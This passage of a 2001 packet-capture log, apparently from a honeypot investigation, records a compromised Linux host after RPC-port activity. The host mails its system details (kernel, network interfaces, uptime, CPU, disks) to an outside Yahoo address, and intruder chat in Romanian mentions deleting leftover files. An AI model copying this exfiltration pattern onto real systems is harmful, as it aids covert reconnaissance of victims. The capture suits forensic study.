32 TCP Options (3) => NOP NOP TS: 3021853 23821697 2A 20 41 6D 20 74 72 69 6D 69 73 20 6D 61 69 6C * Am trimis mail 75 6C 20 2E 2E 2E 20 73 74 65 72 67 65 6D 20 66 ul ... stergem f 69 73 69 65 72 65 6C 65 20 63 61 72 65 20 6E 75 isierele care nu 20 6D 61 69 20 74 72 65 62 75 69 65 20 2E 0A 0A mai trebuie ... 0A 2A 20 47 20 41 20 54 20 41 20 2A 0A 0A 2A 20 .* G A T A *..* 54 68 61 74 20 57 61 73 20 4E 69 63 65 20 4C 61 That Was Nice La 73 74 20 0A st . =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:45:15.029271 211.185.125.124:4450 -> 172.16.1.108:39168 TCP TTL:43 TOS:0x0 ID:37679 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x9C6D2C68 Ack: 0x59606B4A Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23821725 3021853 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:45:18.466008 211.185.125.124:3500 -> 172.16.1.108:111 TCP TTL:43 TOS:0x0 ID:40122 IpLen:20 DgmLen:52 DF ***A***F Seq: 0x9B6338C5 Ack: 0x5820ADD0 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23822070 2878772 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:45:18.467023 211.185.125.124:4450 -> 172.16.1.108:39168 TCP TTL:43 TOS:0x0 ID:40121 IpLen:20 DgmLen:52 DF ***A***F Seq: 0x9C6D2C68 Ack: 0x59606B4A Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23822070 3021853 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:45:18.467298 172.16.1.108:111 -> 211.185.125.124:3500 TCP TTL:63 TOS:0x0 ID:415 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x5820ADD0 Ack: 0x9B6338C6 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 3022224 23822070 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:45:18.467653 172.16.1.108:111 -> 211.185.125.124:3500 TCP TTL:63 TOS:0x0 ID:416 IpLen:20 DgmLen:52 DF ***A***F Seq: 0x5820ADD0 Ack: 0x9B6338C6 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 3022224 23822070 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:45:18.468708 172.16.1.108:39168 -> 211.185.125.124:4450 TCP TTL:63 TOS:0x0 ID:417 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x59606B4A Ack: 0x9C6D2C69 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 3022224 23822070 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:45:19.053616 211.185.125.124:4450 -> 172.16.1.108:39168 TCP TTL:43 TOS:0x0 ID:41938 IpLen:20 DgmLen:52 DF ***A***F Seq: 0x9C6D2C68 Ack: 0x59606B4A Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23822121 3021853 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:45:19.987077 211.185.125.124:4450 -> 172.16.1.108:39168 TCP TTL:43 TOS:0x0 ID:43297 IpLen:20 DgmLen:52 DF ***A***F Seq: 0x9C6D2C68 Ack: 0x59606B4A Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23822223 3021853 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:45:21.457298 211.185.125.124:3500 -> 172.16.1.108:111 TCP TTL:43 TOS:0x0 ID:44660 IpLen:20 DgmLen:52 DF ***A***F Seq: 0x9B6338C5 Ack: 0x5820ADD0 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23822370 2878772 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:45:21.460007 172.16.1.108:111 -> 211.185.125.124:3500 TCP TTL:63 TOS:0x0 ID:418 IpLen:20 DgmLen:52 DF ***A***F Seq: 0x5820ADD0 Ack: 0x9B6338C6 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 3022524 23822370 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:45:21.704181 211.185.125.124:3500 -> 172.16.1.108:111 TCP TTL:43 TOS:0x0 ID:44826 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x9B6338C6 Ack: 0x5820ADD1 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23822394 3022524 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:45:22.027709 211.185.125.124:4450 -> 172.16.1.108:39168 TCP TTL:43 TOS:0x0 ID:45110 IpLen:20 DgmLen:52 DF ***A***F Seq: 0x9C6D2C68 Ack: 0x59606B4A Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23822427 3021853 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:45:26.105475 211.185.125.124:4450 -> 172.16.1.108:39168 TCP TTL:43 TOS:0x0 ID:48499 IpLen:20 DgmLen:52 DF ***A***F Seq: 0x9C6D2C68 Ack: 0x59606B4A Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23822835 3021853 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:45:34.287384 211.185.125.124:4450 -> 172.16.1.108:39168 TCP TTL:43 TOS:0x0 ID:55718 IpLen:20 DgmLen:52 DF ***A***F Seq: 0x9C6D2C68 Ack: 0x59606B4A Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23823651 3021853 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:45:50.608003 211.185.125.124:4450 -> 172.16.1.108:39168 TCP TTL:43 TOS:0x0 ID:6991 IpLen:20 DgmLen:52 DF ***A***F Seq: 0x9C6D2C68 Ack: 0x59606B4A Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23825283 3021853 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:46:15.135480 172.16.1.108:1028 -> 216.136.129.14:25 TCP TTL:63 TOS:0x0 ID:425 IpLen:20 DgmLen:60 DF ******S* Seq: 0xB5F62091 Ack: 0x0 Win: 0x7D78 TcpLen: 40 TCP Options (5) => MSS: 1460 SackOK TS: 3027891 0 NOP WS: 0 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:46:15.250673 216.136.129.14:25 -> 172.16.1.108:1028 TCP TTL:48 TOS:0x0 ID:63923 IpLen:20 DgmLen:44 DF ***A**S* Seq: 0xBC2C4D1 Ack: 0xB5F62092 Win: 0x4470 TcpLen: 24 TCP Options (1) => MSS: 1460 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:46:15.252006 172.16.1.108:1028 -> 216.136.129.14:25 TCP TTL:63 TOS:0x0 ID:426 IpLen:20 DgmLen:40 DF ***A**** Seq: 0xB5F62092 Ack: 0xBC2C4D2 Win: 0x7D78 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:46:15.544290 216.136.129.14:25 -> 172.16.1.108:1028 TCP TTL:48 TOS:0x0 ID:64056 IpLen:20 DgmLen:93 DF ***AP*** Seq: 0xBC2C4D2 Ack: 0xB5F62092 Win: 0x4470 TcpLen: 20 32 32 30 20 59 53 6D 74 70 20 6D 74 61 35 30 32 220 YSmtp mta502 2E 6D 61 69 6C 2E 79 61 68 6F 6F 2E 63 6F 6D 20 .mail.yahoo.com 45 53 4D 54 50 20 73 65 72 76 69 63 65 20 72 65 ESMTP service re 61 64 79 0D 0A ady.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:46:15.545568 172.16.1.108:1028 -> 216.136.129.14:25 TCP TTL:63 TOS:0x0 ID:427 IpLen:20 DgmLen:40 DF ***A**** Seq: 0xB5F62092 Ack: 0xBC2C507 Win: 0x7D78 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:46:15.546107 172.16.1.108:1028 -> 216.136.129.14:25 TCP TTL:63 TOS:0x0 ID:428 IpLen:20 DgmLen:52 DF ***AP*** Seq: 0xB5F62092 Ack: 0xBC2C507 Win: 0x7D78 TcpLen: 20 45 48 4C 4F 20 61 73 64 66 31 0D 0A EHLO asdf1.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:46:15.667081 216.136.129.14:25 -> 172.16.1.108:1028 TCP TTL:48 TOS:0x0 ID:64137 IpLen:20 DgmLen:115 DF ***AP*** Seq: 0xBC2C507 Ack: 0xB5F6209E Win: 0x4470 TcpLen: 20 32 35 30 2D 6D 74 61 35 30 32 2E 6D 61 69 6C 2E 250-mta502.mail. 79 61 68 6F 6F 2E 63 6F 6D 0D 0A 32 35 30 2D 38 yahoo.com..250-8 42 49 54 4D 49 4D 45 0D 0A 32 35 30 2D 53 49 5A BITMIME..250-SIZ 45 20 33 31 34 35 37 32 38 0D 0A 32 35 30 20 50 E 3145728..250 P 49 50 45 4C 49 4E 49 4E 47 0D 0A IPELINING.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:46:15.668890 172.16.1.108:1028 -> 216.136.129.14:25 TCP TTL:63 TOS:0x0 ID:429 IpLen:20 DgmLen:73 DF ***AP*** Seq: 0xB5F6209E Ack: 0xBC2C552 Win: 0x7D78 TcpLen: 20 4D 41 49 4C 20 46 72 6F 6D 3A 3C 72 6F 6F 74 40 MAIL From: SIZE=836. 0A . =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:46:15.781129 216.136.129.14:25 -> 172.16.1.108:1028 TCP TTL:48 TOS:0x0 ID:64198 IpLen:20 DgmLen:68 DF ***AP*** Seq: 0xBC2C552 Ack: 0xB5F620BF Win: 0x4470 TcpLen: 20 32 35 30 20 73 65 6E 64 65 72 20 3C 72 6F 6F 74 250 sender ok.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:46:15.782714 172.16.1.108:1028 -> 216.136.129.14:25 TCP TTL:63 TOS:0x0 ID:430 IpLen:20 DgmLen:71 DF ***AP*** Seq: 0xB5F620BF Ack: 0xBC2C56E Win: 0x7D78 TcpLen: 20 52 43 50 54 20 54 6F 3A 3C 62 69 64 69 5F 64 61 RCPT To:.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:46:15.904080 216.136.129.14:25 -> 172.16.1.108:1028 TCP TTL:48 TOS:0x0 ID:64256 IpLen:20 DgmLen:80 DF ***AP*** Seq: 0xBC2C56E Ack: 0xB5F620DE Win: 0x4470 TcpLen: 20 32 35 30 20 72 65 63 69 70 69 65 6E 74 20 3C 62 250 recipient ok.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:46:15.905709 172.16.1.108:1028 -> 216.136.129.14:25 TCP TTL:63 TOS:0x0 ID:431 IpLen:20 DgmLen:46 DF ***AP*** Seq: 0xB5F620DE Ack: 0xBC2C596 Win: 0x7D78 TcpLen: 20 44 41 54 41 0D 0A DATA.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:46:16.011154 216.136.129.14:25 -> 172.16.1.108:1028 TCP TTL:48 TOS:0x0 ID:64334 IpLen:20 DgmLen:54 DF ***AP*** Seq: 0xBC2C596 Ack: 0xB5F620E4 Win: 0x4470 TcpLen: 20 33 35 34 20 67 6F 20 61 68 65 61 64 0D 0A 354 go ahead.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:46:16.016897 172.16.1.108:1028 -> 216.136.129.14:25 TCP TTL:63 TOS:0x0 ID:432 IpLen:20 DgmLen:1131 DF ***AP*** Seq: 0xB5F620E4 Ack: 0xBC2C5A4 Win: 0x7D78 TcpLen: 20 52 65 63 65 69 76 65 64 3A 20 28 66 72 6F 6D 20 Received: (from 72 6F 6F 74 40 6C 6F 63 61 6C 68 6F 73 74 29 0D root@localhost). 0A 09 62 79 20 61 73 64 66 31 20 28 38 2E 39 2E ..by asdf1 (8.9. 33 2F 38 2E 39 2E 33 29 20 69 64 20 54 41 41 30 3/8.9.3) id TAA0 30 39 35 32 0D 0A 09 66 6F 72 20 62 69 64 69 5F 0952...for bidi_ 64 61 6D 6D 40 79 61 68 6F 6F 2E 63 6F 6D 3B 20 damm@yahoo.com; 54 68 75 2C 20 31 35 20 4D 61 72 20 32 30 30 31 Thu, 15 Mar 2001 20 31 39 3A 34 36 3A 30 35 20 2D 30 36 30 30 0D 19:46:05 -0600. 0A 44 61 74 65 3A 20 54 68 75 2C 20 31 35 20 4D .Date: Thu, 15 M 61 72 20 32 30 30 31 20 31 39 3A 34 36 3A 30 35 ar 2001 19:46:05 20 2D 30 36 30 30 0D 0A 46 72 6F 6D 3A 20 72 6F -0600..From: ro 6F 74 20 3C 72 6F 6F 74 40 61 73 64 66 31 3E 0D ot . 0A 4D 65 73 73 61 67 65 2D 49 64 3A 20 3C 32 30 .Message-Id: <20 30 31 30 33 31 36 30 31 34 36 2E 54 41 41 30 30 0103160146.TAA00 39 35 32 40 61 73 64 66 31 3E 0D 0A 54 6F 3A 20 952@asdf1>..To: 62 69 64 69 5F 64 61 6D 6D 40 79 61 68 6F 6F 2E bidi_damm@yahoo. 63 6F 6D 0D 0A 53 75 62 6A 65 63 74 3A 20 72 6F com..Subject: ro 6F 74 65 0D 0A 0D 0A 2A 20 49 6E 66 6F 20 3A 20 ote....* Info : 4C 69 6E 75 78 20 61 73 64 66 31 20 32 2E 32 2E Linux asdf1 2.2. 31 34 2D 35 2E 30 20 23 31 20 54 75 65 20 4D 61 14-5.0 #1 Tue Ma 72 20 37 20 32 30 3A 35 33 3A 34 31 20 45 53 54 r 7 20:53:41 EST 20 32 30 30 30 20 69 35 38 36 20 75 6E 6B 6E 6F 2000 i586 unkno 77 6E 0D 0A 2A 20 48 6F 73 74 6E 61 6D 65 20 3A wn..* Hostname : 20 61 73 64 66 31 0D 0A 2A 20 49 66 43 6F 6E 66 asdf1..* IfConf 69 67 20 3A 20 20 20 20 20 20 20 20 20 20 20 69 ig : i 6E 65 74 20 61 64 64 72 3A 31 32 37 2E 30 2E 30 net addr:127.0.0 2E 31 20 20 42 63 61 73 74 3A 31 32 37 2E 32 35 .1 Bcast:127.25 35 2E 32 35 35 2E 32 35 35 20 20 4D 61 73 6B 3A 5.255.255 Mask: 32 35 35 2E 30 2E 30 2E 30 0D 0A 20 20 20 20 20 255.0.0.0.. 20 20 20 20 20 69 6E 65 74 20 61 64 64 72 3A 31 inet addr:1 37 32 2E 31 36 2E 31 2E 31 30 38 20 20 42 63 61 72.16.1.108 Bca 73 74 3A 31 37 32 2E 31 36 2E 31 2E 32 35 35 20 st:172.16.1.255 20 4D 61 73 6B 3A 32 35 35 2E 32 35 35 2E 32 35 Mask:255.255.25 35 2E 30 0D 0A 2A 20 55 70 74 69 6D 65 20 3A 20 5.0..* Uptime : 20 20 37 3A 34 35 70 6D 20 20 75 70 20 20 38 3A 7:45pm up 8: 32 33 2C 20 20 30 20 75 73 65 72 73 2C 20 20 6C 23, 0 users, l 6F 61 64 20 61 76 65 72 61 67 65 3A 20 30 2E 30 oad average: 0.0 30 2C 20 30 2E 30 30 2C 20 30 2E 30 30 0D 0A 2A 0, 0.00, 0.00..* 20 43 70 75 20 56 65 6E 64 6F 72 20 49 44 20 3A Cpu Vendor ID : 20 76 65 6E 64 6F 72 5F 69 64 09 3A 20 47 65 6E vendor_id.: Gen 75 69 6E 65 49 6E 74 65 6C 0D 0A 2A 20 43 70 75 uineIntel..* Cpu 20 4D 6F 64 65 6C 20 3A 20 6D 6F 64 65 6C 09 09 Model : model.. 3A 20 34 0D 0A 6D 6F 64 65 6C 20 6E 61 6D 65 09 : 4..model name. 3A 20 50 65 6E 74 69 75 6D 20 4D 4D 58 0D 0A 2A : Pentium MMX..* 20 43 70 75 20 53 70 65 65 64 3A 20 63 70 75 20 Cpu Speed: cpu 4D 48 7A 09 09 3A 20 32 30 30 2E 34 35 37 31 37 MHz..: 200.45717 31 0D 0A 2A 20 42 6F 67 6F 6D 69 70 73 3A 20 62 1..* Bogomips: b 6F 67 6F 6D 69 70 73 09 3A 20 33 39 39 2E 37 37 ogomips.: 399.77 0D 0A 2A 20 53 70 61 74 69 75 20 4C 69 62 65 72 ..* Spatiu Liber 3A 20 46 69 6C 65 73 79 73 74 65 6D 20 20 20 20 : Filesystem 20 20 20 20 20 20 20 20 53 69 7A 65 20 20 55 73 Size Us 65 64 20 41 76 61 69 6C 20 55 73 65 25 20 4D 6F ed Avail Use% Mo 75 6E 74 65 64 20 6F 6E 0D 0A 2F 64 65 76 2F 68 unted on../dev/h 64 61 38 20 20 20 20 20 20 20 20 20 20 20 20 20 da8 32 35 31 4D 20 20 20 33 33 4D 20 20 32 30 35 4D 251M 33M 205M 20 20 31 34 25 20 2F 0D 0A 2F 64 65 76 2F 68 64 14% /../dev/hd 61 31 20 20 20 20 20 20 20 20 20 20 20 20 20 20 a1 32 33 4D 20 20 32 2E 34 4D 20 20 20 31 39 4D 20 23M 2.4M 19M 20 31 31 25 20 2F 62 6F 6F 74 0D 0A 2F 64 65 76 11% /boot../dev 2F 68 64 61 36 20 20 20 20 20 20 20 20 20 20 20 /hda6 20 20 31 2E 36 47 20 20 32 2E 31 4D 20 20 31 2E 1.6G 2.1M 1. 35 47 20 20 20 30 25 20 2F 68 6F 6D 65 0D 0A 2F 5G 0% /home../ 64 65 76 2F 68 64 61 35 20 20 20 20 20 20 20 20 dev/hda5 20 20 20 20 20 31 2E 36 47 20 20 33 36 37 4D 20 1.6G 367M 20 31 2E 32 47 20 20 32 33 25 20 2F 75 73 72 0D 1.2G 23% /usr. 0A 2F 64 65 76 2F 68 64 61 37 20 20 20 20 20 20 ./dev/hda7 20 20 20 20 20 20 20 32 35 31 4D 20 20 35 2E 33 251M 5.3 4D 20 20 32 33 32 4D 20 20 20 32 25 20 2F 76 61 M 232M 2% /va 72 0D 0A r.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:46:16.330832 216.136.129.14:25 -> 172.16.1.108:1028 TCP TTL:48 TOS:0x0 ID:64545 IpLen:20 DgmLen:40 DF ***A**** Seq: 0xBC2C5A4 Ack: 0xB5F62527 Win: 0x4470 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:46:16.332036 172.16.1.108:1028 -> 216.136.129.14:25 TCP TTL:63 TOS:0x0 ID:433 IpLen:20 DgmLen:43 DF ***AP*** Seq: 0xB5F62527 Ack: 0xBC2C5A4 Win: 0x7D78 TcpLen: 20 2E 0D 0A ... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:46:16.530166 216.136.129.14:25 -> 172.16.1.108:1028 TCP TTL:48 TOS:0x0 ID:64673 IpLen:20 DgmLen:40 DF ***A**** Seq: 0xBC2C5A4 Ack: 0xB5F6252A Win: 0x4470 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:46:16.569919 216.136.129.14:25 -> 172.16.1.108:1028 TCP TTL:48 TOS:0x0 ID:64691 IpLen:20 DgmLen:55 DF ***AP*** Seq: 0xBC2C5A4 Ack: 0xB5F6252A Win: 0x4470 TcpLen: 20 32 35 30 20 6F 6B 20 64 69 72 64 65 6C 0D 0A 250 ok dirdel.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:46:16.573463 172.16.1.108:1028 -> 216.136.129.14:25 TCP TTL:63 TOS:0x0 ID:435 IpLen:20 DgmLen:46 DF ***AP*** Seq: 0xB5F6252A Ack: 0xBC2C5B3 Win: 0x7D78 TcpLen: 20 51 55 49 54 0D 0A QUIT.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:46:16.685922 216.136.129.14:25 -> 172.16.1.108:1028 TCP TTL:48 TOS:0x0 ID:64754 IpLen:20 DgmLen:67 DF ***AP*** Seq: 0xBC2C5B3 Ack: 0xB5F62530 Win: 0x4470 TcpLen: 20 32 32 31 20 6D 74 61 35 30 32 2E 6D 61 69 6C 2E 221 mta502.mail. 79 61 68 6F 6F 2E 63 6F 6D 0D 0A yahoo.com.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:46:16.687409 172.16.1.108:1028 -> 216.136.129.14:25 TCP TTL:63 TOS:0x0 ID:436 IpLen:20 DgmLen:40 DF ***A***F Seq: 0xB5F62530 Ack: 0xBC2C5CE Win: 0x7D78 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:46:16.687453 216.136.129.14:25 -> 172.16.1.108:1028 TCP TTL:48 TOS:0x0 ID:64755 IpLen:20 DgmLen:40 DF ***A***F Seq: 0xBC2C5CE Ack: 0xB5F62530 Win: 0x4470 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:46:16.688670 172.16.1.108:1028 -> 216.136.129.14:25 TCP TTL:63 TOS:0x0 ID:437 IpLen:20 DgmLen:40 DF ***A**** Seq: 0xB5F62531 Ack: 0xBC2C5CF Win: 0x7D78 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:46:16.804381 216.136.129.14:25 -> 172.16.1.108:1028 TCP TTL:48 TOS:0x0 ID:64796 IpLen:20 DgmLen:40 DF ***A***F Seq: 0xBC2C5CE Ack: 0xB5F62531 Win: 0x4470 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:46:23.226842 211.185.125.124:4450 -> 172.16.1.108:39168 TCP TTL:43 TOS:0x0 ID:40002 IpLen:20 DgmLen:52 DF ***A***F Seq: 0x9C6D2C68 Ack: 0x59606B4A Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23828547 3021853 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:46:23.795364 172.16.1.108:1029 -> 209.61.188.33:25 TCP TTL:63 TOS:0x0 ID:445 IpLen:20 DgmLen:60 DF ******S* Seq: 0xB679C13C Ack: 0x0 Win: 0x7D78 TcpLen: 40 TCP Options (5) => MSS: 1460 SackOK TS: 3028756 0 NOP WS: 0 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:46:23.873931 209.61.188.33:25 -> 172.16.1.108:1029 TCP TTL:46 TOS:0x0 ID:0 IpLen:20 DgmLen:60 DF ***A**S* Seq: 0xB6BBA1E1 Ack: 0xB679C13D Win: 0x16A0 TcpLen: 40 TCP Options (5) => MSS: 1460 SackOK TS: 14595957 3028756 NOP TCP Options => WS: 0 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:46:23.875282 172.16.1.108:1029 -> 209.61.188.33:25 TCP TTL:63 TOS:0x0 ID:446 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xB679C13D Ack: 0xB6BBA1E2 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 3028765 14595957 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:46:24.453124 209.61.188.33:43497 -> 172.16.1.108:113 TCP TTL:46 TOS:0x0 ID:0 IpLen:20 DgmLen:60 DF ******S* Seq: 0xB69ABEFA Ack: 0x0 Win: 0x16D0 TcpLen: 40 TCP Options (5) => MSS: 1460 SackOK TS: 14596014 0 NOP WS: 0 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:46:24.454531 172.16.1.108:113 -> 209.61.188.33:43497 TCP TTL:63 TOS:0x0 ID:447 IpLen:20 DgmLen:60 DF ***A**S* Seq: 0xB6EA921A Ack: 0xB69ABEFB Win: 0x7D78 TcpLen: 40 TCP Options (5) => MSS: 1460 SackOK TS: 3028823 14596014 NOP TCP Options => WS: 0 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:46:24.531341 209.61.188.33:43497 -> 172.16.1.108:113 TCP TTL:49 TOS:0x0 ID:0 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xB69ABEFB Ack: 0xB6EA921B Win: 0x16D0 TcpLen: 32 TCP Options (3) => NOP NOP TS: 14596022 3028823 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:46:24.532809 209.61.188.33:43497 -> 172.16.1.108:113 TCP TTL:49 TOS:0x0 ID:0 IpLen:20 DgmLen:61 DF ***AP*** Seq: 0xB69ABEFB Ack: 0xB6EA921B Win: 0x16D0 TcpLen: 32 TCP Options (3) => NOP NOP TS: 14596022 3028823 31 30 32 39 2C 32 35 0D 0A 1029,25.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:46:24.534078 172.16.1.108:113 -> 209.61.188.33:43497 TCP TTL:63 TOS:0x0 ID:448 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xB6EA921B Ack: 0xB69ABF04 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 3028831 14596022 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:46:24.536794 172.16.1.108:113 -> 209.61.188.33:43497 TCP TTL:63 TOS:0x0 ID:449 IpLen:20 DgmLen:86 DF ***AP*** Seq: 